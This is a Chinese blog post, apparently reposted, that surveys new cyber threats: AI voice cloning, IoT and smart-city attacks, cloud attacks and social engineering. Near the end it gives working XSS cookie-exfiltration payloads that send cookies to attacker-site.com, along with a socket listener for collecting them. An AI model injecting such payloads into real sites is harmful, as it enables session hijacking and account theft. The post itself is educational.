ChatGPT:你真的了解网络安全吗?浅谈攻击防御进行时之网络攻击新威胁

news2024/11/18 9:28:09

ChatGPT:你真的了解网络安全吗?浅谈网络安全攻击防御进行时

    • 网络攻击新威胁
      • 1) 人工智能的应用
      • 2) 5G和物联网的崛起
      • 3) 云安全
      • 4) 社交工程的威胁
    • 总结

ChatGPT(全名:Chat Generative Pre-trained Transformer),美国OpenAI 研发的聊天机器人程序,是人工智能技术驱动的自然语言处理工具。

在这里插入图片描述
基于其语言模型庞大、可控制、具有高度扩展性的特点,本文通过对话ChatGPT,浅谈网络安全攻击防御进行时。

目录索引:
ChatGPT:你真的了解网络安全吗?浅谈网络安全攻击防御进行时之传统的网络安全

ChatGPT:你真的了解网络安全吗?浅谈网络安全攻击防御进行时之网络安全新定义

ChatGPT:你真的了解网络安全吗?浅谈网络安全攻击防御进行时之网络攻击新威胁

ChatGPT:你真的了解网络安全吗?浅谈网络安全攻击防御进行时之网络安全新防御

ChatGPT:你真的了解网络安全吗?浅谈网络安全攻击防御进行时之网络安全新总结

网络攻击新威胁

基于当前网络安全领域的研究和专家、业内人士的观点和预测,同时也结合了历史上一些大规模网络安全事件的经验教训,关注到技术的发展方向、市场的发展趋势,从多个角度进行分析和综合评估,并根据分析结果得出相应的网络安全趋势。

1) 人工智能的应用

在这里插入图片描述

随着人工智能技术的发展,黑客也越来越多地使用AI进行攻击,包括生成虚假信息、自动化渗透测试等。
现实中已经有一些黑客使用人工智能技术进行攻击的例子:

  • DeepLocker:这是IBM安全团队最近开发的一种恶意软件,它可以使用人工智能算法来自我保护,并在目标计算机上对特定目标感兴趣的文件进行攻击。它可以识别出特定的用户、设备和应用程序等信息,并自动调整攻击策略和技术。

  • AI声音模仿攻击:这是一种利用人工智能来模仿受害者的语音和特征,从而欺骗系统并获取权限或敏感信息的攻击方式。这种攻击已经被用于进行社交工程和电话钓鱼等攻击。

部分AI声音模仿代码:

from pathlib import Path
import soundfile as sf
import os
from paddlespeech.t2s.exps.syn_utils import get_am_output
from paddlespeech.t2s.exps.syn_utils import get_frontend
from paddlespeech.t2s.exps.syn_utils import get_predictor
from paddlespeech.t2s.exps.syn_utils import get_voc_output

# 在其他环境中,记得修改下面这两个变量的路径
am_inference_dir = os.path.join("/home/aistudio/inference", exp_name)
voc_inference_dir = "/home/aistudio/PaddleSpeech/examples/other/tts_finetune/tts3/models/pwgan_aishell3_static_1.1.0"  # 这里以 pwgan_aishell3 为例子

# 音频生成的路径,修改成你音频想要保存的路径
wav_output_dir = "work/inference_demo"

# 选择设备[gpu / cpu],这里以GPU为例子, 
device = "cpu"

# 想要生成的文本和对应文件名

text_dict = {
    "1": "今天天气真不错,欢迎和我一起玩。",
    "2": "我认为跑步给我的身体带来了健康。",
}

# frontend
frontend = get_frontend(
    lang="mix",
    phones_dict=os.path.join(am_inference_dir, "phone_id_map.txt"),
    tones_dict=None
)

# am_predictor
am_predictor = get_predictor(
    model_dir=am_inference_dir,
    model_file="fastspeech2_mix" + ".pdmodel",
    params_file="fastspeech2_mix" + ".pdiparams",
    device=device)

# voc_predictor
voc_predictor = get_predictor(
    model_dir=voc_inference_dir,
    model_file="pwgan_aishell3" + ".pdmodel",    # 这里以 pwgan_aishell3 为例子,其它模型记得修改此处模型名称
    params_file="pwgan_aishell3" + ".pdiparams",
    device=device)

output_dir = Path(wav_output_dir)
output_dir.mkdir(parents=True, exist_ok=True)

sentences = list(text_dict.items())

merge_sentences = True
fs = 24000
for utt_id, sentence in sentences:
    am_output_data = get_am_output(
        input=sentence,
        am_predictor=am_predictor,
        am="fastspeech2_mix",
        frontend=frontend,
        lang="mix",
        merge_sentences=merge_sentences,
        speaker_dict=os.path.join(am_inference_dir, "phone_id_map.txt"),
        spk_id=0, )
    wav = get_voc_output(
            voc_predictor=voc_predictor, input=am_output_data)
    # 保存文件
    sf.write(output_dir / (utt_id + ".wav"), wav, samplerate=fs)
  • GPT-3虚假信息生成:GPT-3是目前最先进的自然语言处理模型之一,可以生成高质量的文章、新闻和评论等文本。黑客可以使用这种技术来生成虚假的信息,例如虚假的社交媒体账户、新闻报道或评论等,以操纵公众舆论或诱骗用户下载恶意软件。

  • 自动化渗透测试:黑客可以使用AI来辅助执行渗透测试,并快速识别目标网络中的漏洞和弱点。这种技术可以加速攻击过程并降低发现率。

2) 5G和物联网的崛起

在这里插入图片描述

5G和物联网的快速发展将使得更多的设备与网络连接,使得网络的攻击面变得更加复杂。

以下是一些现实中可能出现的例子:

  • 智能家居设备受到攻击:智能家居设备如智能门锁、智能音响等通常与互联网相连接。如果黑客能够入侵这些设备,就可以从远程控制这些智能装置,从而威胁您的家庭安全和隐私。

在这里插入图片描述
部分串口通讯代码:

if (Serial.available()) {
	serial_cmd = Serial.read();

	switch(serial_cmd) {		
	case '0': {
		Serial.println("\nstart_coordinator(1)");
		if (zigbee_network.start_coordinator(1) == 0) {
			Serial.println("OK");
		}
		else {
			Serial.println("NG");
		}
	}
		break;
	
	case '1': {
		Serial.println("set_permit_joining_req");
		
		zigbee_network.set_permit_joining_req(ALL_ROUTER_AND_COORDINATOR, 60, 1);
	}
		break;
		
	case '3': {
		Serial.println("TOOGLE Switch Req !\n");
		/*
		 * Frame Control, Transaction Sequence Number, Value control
		 * Value control -> 0x00: off, 0x01: on, 0x02: toogle
		*/
		if (control_switch_address) {
			uint8_t st_buffer[3] = { /* Frame control */ 0x01,
									 /* Transaction Sequence Number */0x00,  /* control_switch_cmd_seq++ */
									 /* Value Control */ 0x02}; /* Value Control [ 0x00:OFF , 0x01:ON , 0x02:TOOGLE ] */
			st_buffer[1] = control_switch_cmd_seq++;

			af_data_request_t st_af_data_request;
			st_af_data_request.cluster_id    = ZCL_CLUSTER_ID_PI_GENERIC_TUNNEL;
			st_af_data_request.dst_address   = control_switch_address;
			st_af_data_request.trans_id      = 0x00;
			st_af_data_request.options       = 0x10;
			st_af_data_request.len           = sizeof(st_buffer);
			st_af_data_request.data          = st_buffer;

			zigbee_network.send_af_data_req(st_af_data_request);
		}
		else {
			Serial.println("Please join Switch\n");
		}
	}
		break;

  • 城市基础设施受到攻击:许多城市正在实施智慧城市计划,包括监控摄像头、交通信号灯和停车仪器等设备都被连接到互联网上。如果这些设备被黑客入侵,他们可能会瘫痪整个城市的运转,对公众的生活和财产造成毁灭性影响。

在这里插入图片描述

  • 医疗设备受到攻击:医疗行业中有许多关键的设备和系统,如心脏起搏器和呼吸机等,这些设备也已经与互联网相连。黑客可以通过入侵这些设备来危害患者的生命健康。

在这里插入图片描述

  • 自动驾驶汽车受到攻击:自动驾驶汽车需要通过网络进行通信,例如控制和信息交换。如果这些汽车被黑客入侵,他们可能会将车辆纵向或横向控制权转移给黑客,从而威胁到驾驶者和其他公众的安全。

在这里插入图片描述

3) 云安全

随着云计算技术的广泛应用,云安全的重要性不断提高。

以下是一些云安全攻击的例子:

  • 虚假的虚拟机托管服务:攻击者可能会创建虚假的虚拟机托管服务,以窃取企业的数据或获取对其系统的控制权限。

  • 数据泄露:由于云环境中存储了大量敏感数据,攻击者可能会针对云数据存储库进行攻击,导致大规模数据泄露。

  • 必要服务(例如DNS)的拒绝服务攻击:攻击者可能会利用大量请求来将目标服务器超载,从而禁止必要的服务。

在这里插入图片描述

  • 云端口扫描攻击:在云环境中,攻击者可以轻松扫描公共IP地址和端口范围,从而突破云环境的防御,并查找弱点。

在这里插入图片描述

  • 恶意软件攻击:攻击者可能会利用恶意软件入侵和掌控基础设施,以窃取数据、发起拒绝服务攻击,甚至盗用云资源。

在这里插入图片描述

4) 社交工程的威胁

社交工程是一种通过操纵人的心理或行为来获取信息或破坏系统安全的攻击方法。

以下是一些社交工程攻击的例子:

  • 钓鱼邮件攻击:攻击者发送看似正常的电子邮件,以欺骗一个人点击链接或下载附件。当被点击或下载时,它会导致恶意软件安装或窃取凭据等后果。

在这里插入图片描述

  • 假冒电话和短信攻击:攻击者会冒充合法机构或个人,例如银行职员或客服代表,并骗取个人的敏感信息,例如密码或社会保险号码。

在这里插入图片描述

  • 肩膀冲击攻击:攻击者借用在公共场所如电脑网吧或咖啡店等人身边工作、学习或休息的人,利用其电脑屏幕上的敏感信息或工作文档资料,以偷窃公司机密或个人信息。

  • 在社交网站上的攻击:攻击者可以通过社交网站如Facebook或LinkedIn寻找特定的个人或目标,并使用社交工程技巧进行欺骗,例如社交工程攻击是指通过伪造的账户发送恶意链接或文件等等。

在这里插入图片描述

  • 伪造身份攻击:攻击者冒充受害者本人,以便访问私密信息或者获取敏感数据以行骗。
    Cookie外带部分代码:

以下是一些常见的 XSS 的 Cookie 外带攻击语句:

利用 document.cookie 获取当前域下所有 cookie 的值:

<script>new Image().src="http://attacker-site.com/cookie.php?cookie="+document.cookie;</script>

利用 XMLHttpRequest 对象发送 HTTP 请求,将 Cookie 数据发送到攻击者的服务器:

<script>var xhr = new XMLHttpRequest(); xhr.open("POST", "http://attacker-site.com/logger.php", true); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.send('url=' + encodeURIComponent(document.location.href) + '&cookie=' + encodeURIComponent(document.cookie));</script>

利用 window.location 对象向攻击者的服务器提交请求,附带当前页面的 URL 和 Cookie:

<script>window.location="http://attacker-site.com/logger.php?url="+encodeURIComponent(document.location.href)+"&cookie="+encodeURIComponent(document.cookie);</script>

利用 document.write 返回页面中的Cookie,并将其拼接到目标URL中,作为参数发送到指定的 IP 地址和端口

<script>document.write('<img src="http://ip:端口号/'+document.cookie+'"/>')</script>

在这里插入图片描述
简单启动本机IP地址实现Cookie外带:

import socket

HOST = '本机IP地址'
PORT = 2022

server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 创建一个服务器套接字,使用 IPv4 地址族(AF_INET)和 TCP 传输协议(SOCK_STREAM)
server_socket.bind((HOST, PORT))
# 将服务器套接字与特定的主机地址和端口号进行绑定,以便客户端能够找到它
server_socket.listen(1)

print('等待客户端连接...')

# 接受客户端连接
client_socket, addr = server_socket.accept()
print('客户端已连接:', addr)

# 接收客户端发送的数据
data = client_socket.recv(1024)
print('接收到数据:', data.decode())

# 将接收到的数据原样返回给客户端
client_socket.sendall(data)

# 关闭客户端连接
client_socket.close()
# 使用 close() 方法关闭套接字并释放所有相关的资源;

# 关闭服务器套接字
server_socket.close()
# 使用 close() 方法关闭套接字并释放所有相关的资源。

总结

以上为浅谈攻击防御进行时之网络攻击新威胁。

关注我,遇见攻击新姿势,吸纳网安新知识。

我是秋说,我们下次见。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/563324.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

大龄、零基础,想转行做网络安全。怎样比较可行?这届粉丝可真难带

昨晚上真的给我气孕了。 对于一直以来对网络安全兴趣很大&#xff0c;想以此作为以后的职业方向的人群。 不用担心&#xff0c;你可以选择兼顾工作和学习&#xff0c;以步步为营的方式尝试转行到网络安全领域。 那么&#xff0c;网络安全到底要学些什么呢&#xff1f; &…

getline()与cin.getline()

文章目录 1.getline2.cin.getline3.区别 1.getline 读取一行内容。定义为&#xff1a; istream& getline (istream& is, string& str, char delim);参数一&#xff1a;istream &is 表示一个输入流&#xff0c;譬如cin&#xff1b; 参数二&#xff1a;string…

Tensorflow2基础代码实战系列之双层RNN文本分类任务

深度学习框架Tensorflow2系列 注&#xff1a;大家觉得博客好的话&#xff0c;别忘了点赞收藏呀&#xff0c;本人每周都会更新关于人工智能和大数据相关的内容&#xff0c;内容多为原创&#xff0c;Python Java Scala SQL 代码&#xff0c;CV NLP 推荐系统等&#xff0c;Spark …

自动化测试工具selenium的使用方法

一、前言 由于requests模块是一个不完全模拟浏览器行为的模块&#xff0c;只能爬取到网页的HTML文档信息&#xff0c;无法解析和执行CSS、JavaScript代码&#xff0c;因此需要我们做人为判断&#xff1b; selenium模块本质是通过驱动浏览器&#xff0c;完全模拟浏览器的操作&…

Python爬虫入门案例6:scrapy的基本语法+使用scrapy进行网站数据爬取

几天前在本地终端使用pip下载scrapy遇到了很多麻烦&#xff0c;总是报错&#xff0c;花了很长时间都没有解决&#xff0c;最后发现pycharm里面自带终端&#xff01;&#xff08;狂喜&#xff09;&#xff0c;于是直接在pycharm终端里面写scrapy了 这样的好处就是每次不用切换路…

项目风险应对策略:项目经理应对不确定性的指南

风险应对是项目经理管理项目未来的工具箱。它可以帮助管理人员弄清楚可能会出现什么问题&#xff0c;并让他们有机会为这些问题做好准备。 对抗负面风险的5种策略 如果没有风险管理计划&#xff0c;项目可能会因意外问题或不良风险而迅速脱轨。什么策略可以用来对抗负面风险&…

Salesforce认证|新鲜出炉销售代表认证!

Salesforce一直致力于为专业人士提供测试知识与技能的方法&#xff0c;现在终于轮到销售人员了&#xff01; 前不久&#xff0c;Salesforce宣布推出销售代表认证&#xff0c;这不仅是首个面向销售人员的认证&#xff0c;也是为数不多的非技术类、非顾问类认证&#xff0c;这为…

记录 aaPanel 安装环境失败的经历及解决方案

最近我在一台Debian 11的国外服务器上安装aaPanel&#xff08;即宝塔面板的国际版&#xff09;。在安装完面板后&#xff0c;我继续安装LNMP环境。几分钟后&#xff0c;aaPanel提示LNMP环境已经安装成功。然而&#xff0c;在创建站点时&#xff0c;却提示环境没有安装。 问题排…

财务共享中心成功建立!用友帮助河南水投集团打造财务效率新高地

河南水投集团作为省级水务集团&#xff0c;自成立以来一直坚持以资产筹集资金&#xff0c;以资金建设项目&#xff0c;以运营扩张资本。即使在面对经济下行压力及疫情影响双重挑战下&#xff0c;仍坚持结果导向&#xff0c;通过项目建设推动发展&#xff0c;保持了较好的发展态…

MyBatisPlus更新字段为null的正确姿势以及lambda方式的条件字段解析之源码解析

文章目录 [toc] 1.问题2.原因3.解决方法3.1错误方法方式一&#xff1a;配置全局字段策略方式二&#xff1a;在实体上添加字段策略注解 3.2正确姿势方式一&#xff1a;使用LambdaUpdateWrapper &#xff08;推荐&#xff09;方式二&#xff1a;使用UpdateWrapper方式三 总结 1.问…

沉降仪工作原理

输电线路杆塔倾斜北斗在线监测装置 一、产品概述 杆塔、铁塔在时间、自然因素的影响下&#xff0c;发生的倾斜、偏离等现象&#xff0c;而在人工巡检电力设施时是不容易通过人眼判别的&#xff0c;在日积月累的变化中&#xff0c;铁塔、杆塔会因倾斜幅度过大进一步引发严重的坍…

基于 Bert 论文构建 Question-Answering 模型

访问【WRITE-BUG数字空间】_[内附完整源码和文档] 摘要 本文拜读了提出 Bert 模型的论文&#xff0c;考虑了在 Bert 中算法模型的实现.比较了 Bert 与其他如 Transformer、GPT 等热门 NLP 模型.BERT 在概念上很简单&#xff0c;在经验上也很强大。它推动了 11 项自然语言处理任…

“她经济”崛起,茉莉智慧如何以科技赋能月子中心迭代升级?

近年来&#xff0c;利好生育政策频出&#xff0c;女性消费能力不断提升&#xff0c;以月子中心为核心的产后护理赛道发展势头良好。据iiMedia Research数据&#xff0c;2022年中国月子中心市场规模突破223.0亿元。iiMedia Research市场调查显示&#xff0c;93.5%的受访者认为产…

ubuntu命令记录

centos 下载地址&#xff1a; 网易镜像&#xff1a;http://mirrors.163.com/centos/6/isos/ 搜狐镜像&#xff1a;http://mirrors.sohu.com/centos/6/isos/ VM与LINUX的安装&#xff08;虚拟机的安装&#xff09; 注意&#xff1a;a.必须开启虚拟化&#xff08;一般电脑都默认…

BFT 最前线 | 王小川:2033机器智慧将超人类;扎克伯格财富暴涨;哈工大:能跳跃的昆虫机器人;北京支持“1+4”机器人领域

原创 | 文 BFT机器人 名人动态 CELEBRITY NEWS 01 王小川&#xff1a;10年后机器智慧将超过人类 年底将推出对标GPT-3.5的模型 科技预言大师雷库兹韦尔说人工智能的奇点&#xff0c;机器智慧超过人类会发生在2045年&#xff0c;王小川的判断比这更激进&#xff0c;他认为这一…

复杂的C++继承

文章目录 什么是继承继承方式赋值规则继承中的作用域&#xff08;隐藏&#xff09;子类中的默认成员函数需要自己写默认成员函数的情况 继承与友元及静态成员多继承菱形继承菱形继承的问题菱形虚拟继承 继承和组合 面向对象三大特性&#xff1a;封装继承和多态。封装在类和对象…

2172. 最大公约数

Powered by:NEFU AB-IN Link 文章目录 2172. 最大公约数题意思路代码 2022年第十三届决赛真题 2172. 最大公约数 题意 给定一个数组, 每次操作可以选择数组中任意两个相邻的元素 x , y x, yx,y 并将其 中的一个元素替换为 gcd ⁡ ( x , y ) \operatorname{gcd}(x, y)gcd(x,y),…

从月薪5000到月薪20000,自动化测试应该这样学...

绝大多数测试工程师都是从功能测试做起的&#xff0c;工作忙忙碌碌&#xff0c;每天在各种业务需求学习和点点中度过&#xff0c;过了好多年发现自己还只是一个功能测试工程师。 随着移动互联网的发展&#xff0c;从业人员能力的整体进步&#xff0c;软件测试需要具备的能力要…

征稿丨IJCAI‘23大模型论坛,优秀投稿推荐AI Open和JCST发表

第一届LLMIJCAI’23 Symposium征稿中&#xff0c;优秀投稿论文推荐《AI Open》和 《JCST》发表。 大规模语言模型&#xff08;LLMs&#xff09;&#xff0c;如ChatGPT和GPT-4&#xff0c;以其在自然语言理解和生成方面的卓越能力&#xff0c;彻底改变了人工智能领域。 LLMs广泛…

Go语言文件I/O操作

go语言中的io操作主要学习目标 掌握文件的常规操作掌握ioutil包的使用掌握bufio包的使用 在go中使用 FileInfo接口 定义了IO的一些函数 FileInfo接口 源码追溯 //type.go // A FileInfo describes a file and is returned by Stat and Lstat. type FileInfo fs.FileInfo/…